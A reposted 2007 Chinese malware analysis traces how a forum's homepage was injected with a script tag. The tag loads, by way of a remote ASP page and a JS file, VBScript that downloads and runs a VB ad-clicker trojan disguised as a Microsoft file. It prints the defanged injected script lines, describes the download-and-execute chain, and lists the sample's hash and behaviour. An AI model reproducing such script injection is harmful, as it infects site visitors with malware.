某論壇被加入下載Trojan-clicker.Win32.VB.qq的代碼

來源:互聯網
上載者:User

endurer 原創

2007-02-01 第1

論壇首頁被加入代碼:

/------
<script language="javascript" src="hxxp://*61.146.118.1*1/news***/include*/m***d5.asp?ad*=1****"></script>
------/

m***d5.asp?ad*=1**** 中發現代碼:
/------
document.write("<script language=/"javascript/" src=/"hxxp://www.cnfish.com/editor/htmleditor/images/WINPNT.JS/"></script>");
------/

WINPNT.JS 中發現JavaScript指令碼程式,功能是輸出一段VBScript指令碼程式。
該VBScript指令碼程式的功能是調用自訂函數r(k)來解密用~分隔的數字字串並執行,利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 從另一網站hxxp://www.c***nfi**sh**.com.**/下載檔案WINPNT.VBS,儲存為%temp%/WINPNT.VBS,利用Shell.Application 對象Q 的 ShellExecute 方法 來運行。

WINPNT.VBS 包含VBScript指令碼程式,下載檔案WINPNT.EXE,儲存為%temp%/WINPNT.EXE,使用 Wscript.Sleep 讓指令碼暫停5 秒(5000 毫秒),再利用Wscript.Shell 對象Shell 的 run 方法 來運行。

WINPNT.EXE 採用 VB 編寫,ASPack 2.12 -> Alexey Solodovnikov 加殼。
/----
檔案說明符 : D:/test/WINPNT.EXE
屬性 : A---
語言 : 中文(中國)
檔案版本 : 5.2600.2180
說明 : Microsoft Internet Explorer
著作權 : C) Microsoft Corporation. All rights reserved.
備忘 : Microsoft Windows Printer
產品版本 : 5.2600.2180
產品名稱 : Microsoft Windows Printer
公司名稱 : Microsoft Corporation
合法商標 :
內部名稱 : WINPNT
源檔案名稱 : WINPNT.EXE
建立時間 : 2007-1-31 21:26:56
修改時間 : 2007-1-31 21:26:58
訪問時間 : 2007-1-31 0:0:0
大小 : 23552 位元組 23.0 KB
MD5 : 5c7ced24b750740ca747d943feb11c1c
----/
Kaspersky 報為:Trojan-clicker.Win32.VB.qq

這東東會
在註冊表run鍵下建立啟動項
內建了一批廣告網址列表,隨機彈出廣告視窗
似乎有線上升級或下載檔案功能 

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.